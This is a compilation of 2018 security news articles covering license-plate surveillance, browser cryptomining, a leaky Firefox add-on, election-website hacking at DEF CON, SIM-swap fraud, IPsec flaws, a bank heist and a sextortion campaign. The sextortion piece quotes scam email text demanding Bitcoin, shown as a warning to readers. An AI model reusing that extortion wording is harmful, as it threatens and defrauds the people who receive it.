STE WILLIAMS

As the American Civil Liberties Union (ACLU) found out in 2015 through the Freedom of Information Act, the US Drug Enforcement Administration (DEA) has for years been building a massive national license plate reader (LPR) database that it shares with federal and local authorities, with no clarity on whether courts are overseeing its use.

That blasé approach to mass surveillance of drivers is holding steady, as evidenced by recent revelations about California using an LPR database to track down welfare cheats.

It’s doing so in a manner that’s against the law. As the Electronic Frontier Foundation (EFF) noted when it revealed the surveillance two weeks ago, “California law is crystal clear” on this: any entity – including government agencies such as those that administer welfare programs – that access data collected by automated license plate readers (ALPRs) must implement a privacy and usage policy that ensures that use of this sensitive information “is consistent with respect for individuals’ privacy and civil liberties.”

ALPRs snap photos of all license plates from street poles and police cars as vehicles drive by. To legally get at those images, the Sacramento County Department of Human Assistance (DHA) should have had a policy that includes periodic audits. Also, each time that LPR data was looked up, a purpose should have been recorded.

But for the two years preceding the EFF’s California Public Records Act request, the DHA didn’t tick off those two basic legal requirements – or if they did, it didn’t show up in the logs seen by the EFF.

In fact, between June 2016 through July 2018, 22 employees working on welfare fraud searched ALPR data more than 1,000 times – all without privacy policies posted online or written anywhere, as required by law. Some employees only dipped a toe into the database, only running a single search, while others ran more than 100 searches. One employee ran 214 searches over the course of 20 months, the EFF found.

There were no audits for any of this data access. The EFF also couldn’t find that the reasons for the ALPR data searches were recorded, although the DHA claims that they were.

DHA Director Ann Edwards told the Sacramento Bee that the county’s welfare fraud investigators use the ALPR data to find suspects and collect evidence to prove cases of fraud. She said that the decision to use such data is determined on a case-by-case basis “depending on the investigative needs of the case.”

It was also done without a clue that the agency needed a policy before employees could legally access that data. The DHA claims that it had no idea that a policy, plus a log of reasons for access, plus monthly audits, are required.

The EFF said that the agency spent a week playing catch-up after the civil liberties group asked about the issue, whipping together a privacy policy and posting it to its website. The new policy includes a monthly audit process.

The data in question wasn’t obtained by the DHA. Rather, it paid for it. According to contracts and invoices obtained by the EFF, Sacramento County paid more than $10,000 – about $5,000 per year – for access to data held by a vendor called Vigilant Solutions. Those contracts were signed without going through the competitive bidding process, the EFF notes.

Vigilant is the leading vendor of LPR data. As of 2016, the Atlantic reported that Vigilant had amassed roughly 2.2 billion license-plate photos and was capturing and permanently storing about 80 million additional geotagged images per month.

Vigilant’s dataset has continued to burgeon. In February 2018, news emerged that the LPR vendor would be providing the Department of Homeland Security’s (DHS’s) Immigration and Customs Enforcement (ICE) arm with agency-wide access to its nationwide database, to enable ICE to track license plates across the country. That gives ICE access to billions of license plate records and new powers of real-time location tracking: a profound source of concern to civil libertarians.

Vigilant doesn’t necessarily collect all the data itself. Rather, it acquires data from partners such as car repo agencies and other private groups. Vigilant also partners with police departments, picking up yet more data from camera-equipped police cars.

At the time of ICE gaining access to the data, Jay Stanley, a senior policy analyst who studies LPRs with the ACLU, said that the biggest concern for civil libertarians is the scale of Vigilant’s network, which it’s put together almost completely outside of public accountability:

If ICE were to propose a system that would do what Vigilant does, there would be a huge privacy uproar, and I don’t think Congress would approve it. But because it’s a private contract, they can sidestep that process.

Besides signing those $10,000+ worth of contracts with Vigilant, Sacramento’s DHA also signed an agreement forbidding it from talking to the media about the ALPR program without Vigilant Solutions’ written permission. It also agreed not to use information about Vigilant Solutions in “any manner that is disparaging.”

Why is it even necessary to investigate welfare fraud to this extent?

DHA officials acknowledged in 2013 that “the percentage of fraud cases is statistically low.” In 2012, DHA found fraud in only 0.02% of all welfare cases, or 6.25% of all fraud referrals. It works out to 500 of some 8,000 fraud referrals (out of nearly 200,000 people receiving assistance in Sacramento).

Granted, of late, the DHA has noted higher welfare fraud rates, which includes things such as failing to report income or claiming care for a child who doesn’t actually live with the recipient. The DHA told the Sacramento Bee that since June 2016, when the county first started using ALPR data, its investigators discovered fraud in about 13,000 of the 35,412 fraud referrals they investigated: about 37% of the cases.

Edwards told the Sacramento Bee that the DHA’s investigators are using ALPR data about 2.5% of the time: not heavy usage at all, she said:

It doesn’t appear to be overused. I think we use it very judiciously and only when needed to investigate fraud.

She also said that DHA is already following other parts of California’s privacy law (a law that was passed at the beginning of 2016, near the time the agency started using the ALPR data), including employees justifying their use of the data.

Each time a criminal investigator accesses the information, they… must document the reason why the data is being requested from the system.

As far as the monthly audits go, Edwards told the Sacramento Bee that they would start last week and would happen every two months:

We will be doing a random sampling of times [ALPR data] has been used in the past, in order to confirm that it hasn’t been used inappropriately. If we find as a result of our review that it was used inappropriately, disciplinary action could be taken.

Or hey, how about this instead, suggested EFF investigator Dave Maass: stop using the data immediately and do an investigation of the DHA’s past use. That’s the only way to figure out what welfare fraud investigators were really searching for, he told the Sacramento Bee. For all we know DHA employees could have been doing anything from…

Investigating a major fraud case to spying on their ex-spouses. Were they looking up people in Texas, people on the other side of the country? We just don’t know.

Follow @LisaVaas
Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/MZ8Ppx-8z-U/

Mining internet currency on websites with Coinhive scripts is a lucrative endeavor, but only for a handful of people.

This according to researchers from RWTH Aachen University, who used a new detection technique to track pages mining the cryptocurrency and found that [PDF] just 10 users were responsible for 85 per cent of the links that the Coinhive service uses to mine about $250,000 worth of Monero currency every month.

In other words; it’s nice work if you can get it. And you can’t get it.

The Aachen U group of Jan Rüth, Torsten Zimmermann, Konrad Wolsing, and Oliver Hohlfeld crawled the Alexa million list of top websites and the full .org domain to gather and the fingerprint code Coinhive scripts embedded on pages to link the mining activity to a Coinhive account.

Typically, a Coinhive user will embed the code (ethically or otherwise) into high-traffic web pages. Visitors to the page then execute the JavaScript to perform the calculations needed to mine blocks that create new Monero. Coinhive then takes a 30 per cent cut of the payout and gives the rest to the user.

Because the Coinhive user spreading the code has to include their account token in the script in order to get paid, the researchers were able to measure who is most active in spreading the Coinhive code via shortened links.

What they found was an extremely top-heavy system where only a few people reaped most of the profits.

“We observe a power-law which highlights the existence of few heavy users that created a large number of links,” the researchers said.

“In fact, 1/3 of all links are contributed by a single user only and roughly 85 per cent of all links are created by only 10 users. Of course, a single user could use multiple tokens, however, this would only emphasize our current observations.”

Peanuts for CPU cycles

The researchers are not the first people to find this out. Earlier this year, a Japanese man cuffed for illegally spreading the Coinhive code said he only managed to make around 5,000 Yen, or $45, from the scheme.

Ransomware is so 2017, it’s all cryptomining now among the script kiddies

READ MORE

To be fair, the researchers also note that there simply aren’t that many sites actually using Coinhive. They estimate that just .08 per cent of the sites they probed in the study were actually serving the browser mining code, and Coinhive itself only accounts for around 1.18 per cent of all Monero mining.

“While probably profitable for Coinhive, it remains questionable whether mining is a feasible alternative to ads,” the researchers note.

Although the figures found in the study are interesting, the researchers say it is their fingerprint detection method that could be the most valuable product of the work. They note that the method could be incorporated by blocklists that are currently unable to detect and filter out many of the shortened links used to redirect users to unauthorized mining pages.

“For its detection, we find the public NoCoin filter list to be insufficient to broadly detect browser mining,” the researchers conclude.

“We thus present a new technique based on WebAssembly fingerprinting to identify miners, up to 82 per cent of thereby identified mining websites are not detected by block lists.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/15/coinhive_mining_money/

A security plug-in for the Firefox browser is under fire after users discovered it was collecting and uploading their online activity.

The outcry began after Mozilla featured the Web Security extension on its blog with a post titled “Make Your Firefox Browser a Privacy Superpower.” The plug-in, developed by German company Creative Software Solutions, bills itself as a tool for blocking malicious pages and phishing sites.

Chrome, Firefox pull very unstylish Stylish invasive browser plugin

READ MORE

It also, allegedly, logs what web pages the user visits. Shortly after the post went up, uBlock Origin developer Raymond Hill noticed that the plug-in was gathering and transmitting the address of visited websites to a server in Germany.

Word got back to Mozilla, and the org moved to strike the link to Web Security from its blog and investigate the matter.

“We’ve received concerns from the community about the Web Security extension, and are currently investigating those concerns,” a Mozilla spokesperson told The Register.

“The reference to the extension has been removed from the blog post as part of the investigative process.”

El Reg reached out to Creative Software Solutions, whose managing director Fabian Simon says that the collection of browsing information is only done to check a site against Web Security’s global blacklist.

“This is a necessary step to assure the functionality of the add-on and has nothing to do with tracking the users browser behavior, thus these reports only showed a part of how the add-on works to protect the user,” Simon explained.

“We take privacy very important and do not use this server communication for tracking the users browsing history.”

Simon says he company does not know why Mozilla pulled the link to Web Security, but Creative plans to submit an updated version the extension for review, to prove that everything is on the level.

“I am sure that if they look into the issue they will see that this is a normal and necessary behavior,” he said. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/15/mozilla_security_plugin/

Both adult and kid hackers demonstrated at DEF CON how the hackable voting machine may be the least of our worries in the 2018 elections.

Two 11-year-old budding hackers last week at DEF CON in Las Vegas used SQL injection attack code to break into a replica of the Florida Secretary of State’s website within 15 minutes, altering vote count reports on the site.

Meanwhile, further down the hall in the adult Voting Machine Hacking Village at Caesars Palace, one unidentified hacker spent four hours trying to break into a replica database that housed the real, publicly available state of Ohio voter registration roll. He got as far as the secured server — penetrating two layers of firewalls with a Khali Linux pen testing tool — but in the end was unable to grab the data from the database, which included names and birthdates of registered voters.

“He got to the secure file server but didn’t know how to write the query to pull the data out,” says Alon Nachmany, solution engineer with Cyberbit, which ran the voter registration database simulation. That he got as close to the data as he did was no small feat, however.

“He got very far, but he didn’t have the skill needed to pull the file itself,” Nachmany says.

The setup, using Cyberbit’s training and simulation platform for cyber ranges, was designed to mimic a typical county election system — with a web application server on a DMZ behind a firewall and a secure file server sitting behind its own firewall — but was created more for a red-team training scenario, says Bash Kazi, a Cyberbit partner who built it. “We used a more sophisticated network and attack scenario that somebody would have to much more training to hack,” he says.

While the election-office simulation challenge proved to be too much of one for most takers at the voting system hacking event, security experts say that these and other Web-based systems, such as states’ election-reporting websites and candidate websites, are the most likely (and easy) targets of attackers for the fall midterms.

That’s not to say voting machines are not easy marks: hackers successfully cracked into at least nine different machines in the Village this year, including voting machines, tablets, and e-pollbooks, with buffer overflows, stored passwords, and a lack of encryption, for example. It’s just simpler for a remote hacker such as a nation-state to penetrate a public-facing website to DDoS it, deface it, alter information (such as changing vote count data or polling place information), or access sensitive data stored on its back-end servers than to tamper with a voting machine.

DEF CON and Black Hat founder Jeff Moss says this year’s Village represented an evolution from pure voting machine hacking in 2017 to moving toward election systems and infrastructure. “We’re working from the edges,” Moss says.

“Last year was the big splash. We’re hoping now the that the ‘oohs’ and ‘aahs’ are over, we can now start digging into” other more serious security flaws in election systems, he says. “There’s still work to be done.”

Jake Braun, co-founder and organizer of the DEF CON Voting Village, says including the kids’ portion of DEF CON, R00tz Asylum, in the voting and election hacking events wasn’t meant to be a “gotcha” moment. “The most vulnerable part [of the election system] are these websites,” he says. “The ultimate fake news is changing election results.”

Emmett Brewer, aka @p0wnyb0y, gave himself all of the vote counts, and then tweeted: “I think I won the Florida midterms.” He was first to crack the site, in 10 minutes, followed five minutes later by Audrey, who was able to change the vote counts on the Florida Division of Elections replica site. Brewer, Audrey, and other kid hackers in R00tz were given a handout on SQL injection and how to use it. 

The replica Secretary of State websites and software were set up by Aries Security, whose founder and CEO, Brian Markus, previously converted his Capture the Flag simulator for the US Department of Defense’s cybersecurity training operations.

DEF CON Drama
But DEF CON wouldn’t be DEF CON without a bit of controversy: as the world’s largest hacker conference kicked off last week, the National Association of Secretaries of State (NASS) issued a public statement panning the Voting Village. “Our main concern with the approach taken by DEFCON is that it utilizes a pseudo environment which in no way replicates state election systems, networks or physical security. Providing conference attendees with unlimited physical access to voting machines, most of which are no longer in use, does not replicate accurate physical and cyber protections established by state and local governments before and on Election Day,” NASS said in its statement.

NASS also said allowing hackers to hack “mock” election office networks and voter registration databases isn’t realistic. “It would be extremely difficult to replicate these systems since many states utilize unique networks and custom-built databases with new and updated security protocols,” the association said.

But NASS didn’t dispute potential website weaknesses, however, adding that those sites only provide unofficial and “preliminary” results and have no physical or virtual link to vote-counting systems, so they can’t alter actual vote-count results.

Even so, experts say malicious hackers could wreak chaos and confusion and instill distrust of the election outcomes if they tamper with election-related websites in the run-up to the elections or on Election Day.

Website security analyst Jessica Ortega of SiteLock says website hacking is getting missed amid the wave of voting machine vulnerabilities. “People don’t realize what a weapon it can be,” she says. “It’s almost impossible to impact a legitimate vote count at scale, but you can sow distrust and chaos by defacing a polling place and associated websites, changing the address or phone number of polling places, and the unofficial results that get reported to the media. It’s easy to change a 3 to a 6” in a tally, for example, she says.

Ortega says few local municipalities have DDoS mitigation protections in place. “They don’t even have proper infrastructure for legitimate traffic,” she says, pointing to a recent special election where a county website went down for two hours merely due to high and legitimate traffic, not a DDoS attack.

Paul Gagliardi, former contractor for a US intelligence agency and currently a principal threat researcher at Security ScoreCard, says the entire election ecosystem must be secured, not just voting machines. Funding for state and local IT elections for the most part is relatively low and all about functionality first and security “as an afterthought,” he says. “Hopefully, that changes.”

But DEF CON organizer Braun and others concur that efforts to uncover and address security issues with the election infrastructure overall as well as more intersection between the security community and federal, state, and local officials, didn’t come soon enough for the midterms. “It’s going to be hard to do much for 2018. The goal is before 2020,” Braun says, including more federal funding for election security.

Cyberattacks in Progress
Meantime, Russian nation-state hackers and other potential attackers already have been targeting systems. California Secretary of State Alex Padilla, who headlined a panel at DEF CON, told Dark Reading attempts to attack state election systems “continues” and goes “up and down.”

Padilla said in his opening remarks that while he understood where his colleagues “were coming from” in the NASS statement given the pressures on them to uphold election integrity and security, the first he heard about the statement was when he arrived in Vegas. “We’re trying to strike the right balance of cybersecurity and integrity with confidence in the systems,” he said. “I’m here to listen and learn” from experts at DEF CON, he added.

Also on the panel with Padilla were Jeanette Manfra, US Department of Homeland Security assistant secretary of cybersecurity and communications; Noah Praetz, director of elections in Cook County, Ill.; Neal Kelley, chief of elections and registrar of voters for Orange County, Calif.; and Amber McReynolds, director of elections for the city and county of Denver, Colo.

Orange County’s Kelley reported activity similar to that in 2016. “We’re constantly seeing hits against our firewall: scans. So that level of activity continues like it was in 2016. We haven’t seen that decline,” he told Dark Reading. “Just the same level of standing as we were seeing” in 2016, he said.

Security experts say Russia and other attackers likely have been quietly attacking election systems for some time as part of their campaign to attempt to disrupt the US elections in some way. “I assume most of these things are already in progress,” says Gagliardi. “They don’t happen overnight. I’m confident we’ll see more” activity, he says.

DEF CON plans to publish a final report on all of the Voting Hacking Village findings.

Related Content:

• The ABCs of Hacking a Voting Machine
• DEF CON Invites Kids to ‘Hack the Election’
• 8 Steps Toward Safer Elections
• DEF CON Rocks the Vote with Live Machine Hacking

 

Learn from the industry’s most knowledgeable CISOs and IT security experts in a setting that is conducive to interaction and conversation. Early bird rate ends August 31. Click for more info. 

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/election-websites-back-end-systems-most-at-risk-of-cyberattack-in-midterms/d/d-id/1332554?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Thanks to Brett Cove of SophosLabs for his behind-the-scenes work on this article.

Sextortion is back in the news.

That’s where someone tries to blackmail you by telling you to pay up or else they’ll reveal something truly personal about your sexuality or your sex life.

Typically, sextortionists claim to have infected your laptop or phone with malware while you were browsing, and then to have kept their eye on both your browsing habits and your webcam.

You can imagine the sort of data they claim to have sniffed out – and even if you know jolly well they couldn’t have got it from you, it still makes you wonder what they might claim you’ve been up to.

Last month, for example, we wrote about an ongoing sextortion scam campaign that tried to amplify your fear by throwing a genuine password of yours into the email.

I do know, [PASSWORD REDACTED], is your password. You do not know me and you are probably thinking why you are getting this e mail, correct? 

actually, I placed a malware on the adult videos (pornography) website and do you know what, you visited this web site to experience fun (you know what I mean). While you were watching videos, your internet browser initiated working as a RDP (Remote Desktop) that has a key logger which gave me accessibility to your display and also webcam. after that, my software program obtained all your contacts from your Messenger, Facebook, as well as email. 

The good news here is that the passwords revealed were old ones – typically from accounts that recipients had closed long ago, or where they’d already changed the password.

Even if you were still using the password they claimed to “know”, the crooks hadn’t acquired it by eavesdropping on you or hacking into your computer.

They’d bought or found a bunch of stolen data acquired in some breach or other, and were using it to try and convince you they really had hacked your device.

Well, these guys are back – or, more precisely, never went away, because we’ve seen bursts of this scam for many months already.

This time, the crooks seem to have got hold of a list that ties email addresses and phone numbers together, so they’re putting your phone number (or at least what they think is your phone number) into the email:

It seems that, +1-555-xxx-xx55, is your phone number. You may not know me and you are probably wondering why you are getting this e mail, right?

. . .

I backuped phone. All photo, video and contacts.

I created a double-screen video. 1st part shows the video you were watching (you've got a good taste haha . . .), and 2nd part shows the recording of your web cam.

exactly what should you do?

Well, in my opinion, [AMOUNT FROM $100-$1000 THIS TIME] is a fair price for our little secret. You'll make the payment by Bitcoin (if you do not know this, search "how to buy bitcoin" in Google).

In the 5000 or so samples we extracted from this week’s reports, the amount demanded varied from $100 to $1000 (last time we saw amounts up to $2900).

Interestingly, all the phone numbers had a similar North American format, with five digits Xed out; some Naked Security readers outside North America have reported receiving UK-style numbers with all but the last four digits Xed out.

We can only guess, but it looks as though the stolen data that the crooks acquired this time was pre-redacted – they’d be more convincing if they could reveal your entire number, after all.

Has anyone paid up?

When you try to track down Bitcoin payments, all you can tell is whether someone sent something to the Bitcoin addresses specified.

The 5000 samples from the past week that we used to dig into this latest email campaign each demanded payment into one of just three different Bitcoin addresses, which showed payment histories like this:

  Bitcoin address            BTC received   USD approx
  ------------------------   ------------   ----------
  1GYNxxxxxxxxxxxxxxxxxxLB    0.93094968       $6000
  19Gfxxxxxxxxxxxxxxxxxxai    0.04491935        $300
  1NQrxxxxxxxxxxxxxxxxxxrS    0.00047363          $3

  [BTC1 = $6500, roughly correct at 2018-08-15T16:00Z]

In case you’re wondering, there have been 20 payments into those three addresses, roughly distributed as follows:

   3 payments at $1000
   1 payment  at  $940
   1 payment  at  $780
   1 payment  at  $300
   1 payment  at  $210
   2 payments at  $200
   1 payment  at  $150
   1 payment  at  $100
   2 payments at   $90
   1 payment  at   $80
   1 payments at   $10
   5 payments at    $1

Of course, we can’t tell whether any of the payments into these addresses came from victims of this scam – they could have come from anywhere, including from the crooks themselves.

What to do?

Regular Naked Security readers will know what we recommend in cases like this: DON’T PAY, DON’T PANIC, DON’T REPLY.

Even if the crooks had hacked your computer and recorded material you wish they hadn’t (it needn’t be porn, of course), why pay them not to reveal data that they already possess?

At least in a ransomware attack you are “paying for a positive” – you’re paying for a decryption key that will either work and do what you were hoping, or won’t work and that’s that.

But paying the crooks not to do something, they can just threaten to do it again next week, month, year…

…so it won’t get you anywhere, except to mark you out as someone who already knows how to buy and spend bitcoins.

Fortunately, in this case, the crooks don’t have any browsing logs or webcam footage at all, so it’s all just empty threats.

Hit [Delete] and you’re done with it – tell your friends.

Oh, and use this story to remind yourself, and to convince your boss, that any data breach can lead to ongoing trouble – even if the breach was “just” email addresses and phone numbers, and even if it happened long ago.

That’s the trouble with private data: once out, always out.

Follow @NakedSecurity
Follow @duckblog

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/MJmZPpn5OPw/

Shock horror – it appears Google can track the location of anyone using some of its apps on Android or iPhone even when they’ve told it not to.

That’s according to an “exclusive” from the Associated Press (AP) which describes how researchers at Princeton University have confirmed that Google’s ability to record a user’s location history goes deeper than many realise.

Officially, Android users can turn off tracking using a slider button in the Location section under Settings.

Once deactivated, Google no longer stores a timeline and a precise record of a user’s movements when they take their Android device (or iPhone running Google services and apps) with them.

Checking this in Maps can be done by visiting Google’s Account Settings My Account Activity Other Account Activity click ‘Visit Timeline’ under Location History. This should show a history of a user’s movements while using their device.

But according to AP’s research, turning off Location History doesn’t stop certain Google apps (Maps and Weather for instance) from storing a timestamped location when you open them.

Confusingly, this isn’t the same as Location Data, which uses a range of techniques (cell towers but especially Wi-Fi geolocation) to track where people are, sometimes to within a few metres.

It’s not clear how regular this location polling happens but it’s clearly more regular, and therefore precise, than the type of location data Google picks up when users occasionally open an app.

From the tests carried out by Princeton on AP’s behalf, the latter method can still generate enough data to record someone’s locations during a given period of days without necessarily making it clear how they moved between them.

AP quotes Princeton researcher, Jonathan Mayer:

If you’re going to allow users to turn off something called ‘Location History,’ then all the places where you maintain location history should be turned off. That seems like a pretty straightforward position to have.

Google’s answer to the accusation that it’s being overbearing in its desire to know the location of its users is that this can be paused under “Web and App Activity”.

As Google told AP in response to its findings:

There are a number of different ways that Google may use location to improve people’s experience, including: Location History, Web and App Activity, and through device-level Location Services.

It appears, then, Google draws a distinction between general high-accuracy location data and that collected less frequently by its apps. While this might be an anomaly from the way these have developed historically, Google’s failure to simplify location tracking will sound like a convenient oversight to privacy advocates.

In Google’s view, this is fine because it does inform users that apps can track their location even if those messages are hard to find or rarely encountered.

The most surprising aspect of this story is possibly that anyone is still surprised.

In 2017, a report from Quartz found that Android devices were still having their locations tracked via cell towers even after location history had been turned off, their SIM cards were removed and a factory reset had been initiated.

And it’s not just Google of course – numerous apps are at it, albeit after asking for permissions to do so. It’s not clear how many users decline or turn off location access for apps, but it’s likely to be a minority.

It’s a trade-off in the end. The usefulness of smartphones depends to some degree on navigation apps such as Maps, which require location data. Ditto apps that help to locate lost devices.

The lowdown is clear: if you own a smartphone, you can limit location tracking but for now you can’t turn it off completely.

Follow @JohnEDunn
Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/JQIpOUN2xKQ/

A bitcoin investor is suing ATT for $240m after it allegedly ported his phone number to a hacker, allowing the criminal to steal $24m in cryptocurrency.

Michael Terpin is suing the phone giant [PDF] for the value of the three million electronic coins plus $216m in punitive damages after he claims an ATT employee at a store in Connecticut agreed, in person, to transfer his personal phone number to a new SIM card, despite the account having “high risk” protection following an earlier hacking effort.

The anonymous hacker then used his access to Terpin’s phone number to bypass security on his cryptocurrency accounts, thanks to two-factor authentication sent by text, and transferred millions of dollars to a different account: an approach known as “SIM swap fraud.”

Terpin claims ATT admitted to him that the employee in question agreed to shift the SIM despite the security requirement that they ask for a valid form of ID and having ignored an additional “VIP” requirement that they provide a special six-digit passcode before changes are allowed on the account.

That six-digit extra security step was introduced after Terpin says his account had been targeted – and hacked – six months earlier through the same approach. That time, he says, a hacker made no less than 11 in-store attempts to steal his SIM information before finally succeeding.

On both occasions, the first Terpin knew of the hack was when his phone went dead. The second time, he says he knew immediately what had happened and tried immediately to contact ATT to shut the phone down but was stymied by the fact it was a Sunday and “ATT’s fraud department apparently does not work on Sundays.” By the time he regained access, $23.8m in bitcoin had gone missing, he claims.

By failing to follow procedures and given the extra security on his accounts, Terpin claims that ATT has broken multiple laws and lists no less than sixteen claims for relief ranging from negligence to breach of contract to insufficient security and providing unlawful access to personal information.

The SIMS

SIM swap fraud became an issue more than six years ago and has become an increasing problem, particularly with the growing use of two-factor authentication with hackers often targeting specific individuals.

There are a number of different ways that criminals carry it out but broadly they first gain access to an individual’s username and password – often through malware introduced on their computer – and then contact their mobile phone company and provide a plausible story why their number needs to be transferred to a new SIM card.

Once an attacker has access to their mobile phone, they are able to use it to provide the secondary identification that many online services now require before making significant changes.

Korean cryptocoin exchange $30m lighter after hacking attack

READ MORE

Mobile phone companies responded to early attacks by adding the requirement that employees require a valid ID of the account holder before making any such changes but a number of cases have emerged where criminals paid phone company employees to make changes. Terpin alleges that’s what happened in this case, given that neither a valid ID nor the special six-figure passcode were asked for porting his details to a new SIM.

The big legal question of course is whether ATT is then liable for what is done with that access. Although it appears to have failed to implement its own security requirements – if we take Terpin’s account of the theft to be entirely accurate – ATT’s lawyers will no doubt argue that it cannot be held responsible for everything that happens subsequently.

After all, a hacker would still have required Terpin’s username and password to access a secure cryptocurrency wallet.

Carry case

There are several elements in the lawsuit that suggest Terpin’s lawsuit may not have the tightest legal case, including a colorful but somewhat meandering and irrelevant legal argument in which SIM swap fraud is called a “metastasizing cancer” and ATT’s security a “modern-day Maginot line.”

It cites a relevant FCC fine against ATT for not protecting its users’ privacy but also goes into some depth on an irrelevant argument about media coverage of other SIM fraud cases. The lengthy claims for relief rely heavily on California business law and contractual arguments – which is rarely a good sign when going up against a huge corporation.

Regardless, if Terpin’s version of events are comprehensive, it would appear that ATT failed to implement its own security arrangements and the fact that the account had already been flagged as high risk makes Terpin’s case that much stronger.

ATT for its part has promised to fight the lawsuit. “We dispute these allegations and look forward to presenting our case in court,” said a representative. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/15/att_sued_cryptocurrency/

Security gaps have been identified in widely used implementations of the IPsec protocol, which is used in the set up of Virtual Private Networks (VPNs).

The Internet Key Exchange protocol “IKEv1”, which is part of the IPsec protocol family, has vulnerabilities that enable potential attackers to interfere with the communication process and snoop of supposedly encrypted traffic.

IKEv1 was superseded by IKEv2 years ago the obsolete protocol is still widely used and supported – even by newer devices. This support leaves kit vulnerable to attacks on the encryption-based logon mode of IPsec.

Now for the science bit…

The cryptographic attack works like this: errors are deliberately incorporated into an encoded message and repeatedly sent to a server. Based on the server’s replies to the corrupted message, an attacker can gradually draw better and better conclusions about the encrypted contents until a hacker is able to assume the identity of one of the parties to a conversation.

IPv6 and 5G will make life hell for spooks and cops say Australia’s spooks and cops

READ MORE

More technically the researchers showed that reusing a key pair across different versions and modes of IKE can lead to cross-protocol authentication bypasses, enabling the impersonation of a victim host or network by attackers.

This so-called Bleichenbacher Oracle Attack proved effective against the hardware of four network equipment vendors. The affected vendors were Cisco (CVE-2018-0131), Huawei (CVE-2017-17305), Clavister (CVE-2018-8753), and ZyXEL (CVE-2018-9129). All four vendors published fixes or removed the particular authentication method from their devices’ firmware in response to reports of potential problems, according to the researchers.

Cisco response to the research has been to root out updates to its internetwork operating system (IOS) and IOS XE firmware. as previously reported.

The weakness in the face of a Bleichenbacher oracle attack is not a bug in the standard but rather an implementation error by technology vendors. The security shortcoming only lends itself to abuse by a hacker who has already found his way onto a targeted network through some other mechanism, computer boffins behind the attack add.

Yikes IKE

In a second strand to their research, the same team of computer scientists also showed that both IKEv1 and the current IKEv2 present vulnerabilities during the initial login process, especially if the password is weak. In this scenario it’s be possible to run offline dictionary attack against the PSK (Pre-Shared Key) based IKE modes.

The vulnerability was also communicated to the Computer Emergency Response Team (CERT).

A team of researchers from Dennis Felsch, Martin Grothe and Prof Dr Jörg Schwenk, from Ruhr-Universität Bochum; as well as Adam Czubak and Marcin Szymanek from Opole University in Poland put together the IPsec research. Their research, put together in a paper entitled The Dangers of Key Reuse: Practical Attacks on IPsec IKE, is due to be presented at the Usenix Security Symposium in Baltimore, USA on Thursday (16 October). ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/15/ipsec_vpn_vulnerability/

Cosmos Bank in India says that hackers made off with $13.4m in stolen funds over the weekend.

Multiple reports out of the country say that a group of attackers used cloned cards to withdraw cash from ATMs at a set time and perform a fraudulent SWIFT money transfer. Together, the efforts resulted in about Rs 94 crore ($13.4m) being stolen from the bank and its account holders.

The attack was believed to have taken place in two phases. The first, on Saturday between 1500 and 2200 local time, was an international effort with money mules in 28 different countries, all extracting cash from their local ATMs. According to the Hindustan Times, 15,000 transactions were carried out over the seven-hour period.

The second phase took place Monday, when a SWIFT transaction saw Cosmos move Rs 13.5 crore ($1.93m) to an account at a bank in Hong Kong.

Cybercrooks slurp nearly $1m from Russian bank after pwning router at regional branch

READ MORE

Security reporter Brian Krebs unknowingly broke word about the heist three days ago when he got hold of a confidential alert sent from the FBI to US banks warning of a pending ATM cash-out attack against a then-unnamed financial institution (later found to be Cosmos.)

The warning notes that the Bureau was confident of a cash-out operation set to occur over the weekend (when banks are closed) and that it thought the operation was the result of a breach at a card issuer.

“The cyber criminals typically create fraudulent copies of legitimate cards by sending stolen card data to co-conspirators who imprint the data on reusable magnetic strip cards, such as gift cards purchased at retail stores,” the FBI warned.

“At a pre-determined time, the co-conspirators withdraw account funds from ATMs using these cards.”

The Indian bank has said account holders’ money is safe, but it has suspended online banking in the wake of the incident.

While no official culprit for the attack has been named, India’s Economic Times has reported that North Korea’s Lazarus Group (who have previously targeted banks in the region) is the likely offender. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/15/cosmos_bank_raided/

A team of security experts round up the best and worst of the year in cybersecurity at Black Hat 2018.

(Image: Black Hat via Flickr)

The Pwnie awards, which take place at the annual Black Hat conference in Las Vegas each summer, acknowledge the achievements and failures of cybersecurity researchers and the infosec community as a whole.

Security pros started submitting nominations in June 2018 for bugs disclosed over the past year. Nominees were posted in August and winners were determined by a panel of security researchers, or “the closest to a jury of peers a hacker is likely to ever get,” its website quips.

Pwnie categories range from “Best Privilege Escalation Bug” to “Most Overhyped Bug” to “Lamest Vendor Response.” A Lifetime Achievement award recognizes a member of the security community who stands out for research and contributions to the industry.

This year’s informal awards ceremony, hosted by a panel of respected (and hilarious) security experts, was packed with attendees and laughs as they presented Pwnies for the best and worst in security. Some lucky award recipients were in the audience; others (John McAfee, for example) weren’t.

“We believe this is the best antidote to any creeping cynicism we have in our community,” joked Justine Bone, CEO of MedSec and one of the Pwnie panelists.

Read on to learn more about who won, who lost, and who pwned at this year’s show.

Learn from the industry’s most knowledgeable CISOs and IT security experts in a setting that is conducive to interaction and conversation. Early bird rate ends August 31. Click for more info. 

 

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/2018-pwnie-awards-who-pwned-who-got-pwned/d/d-id/1332562?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple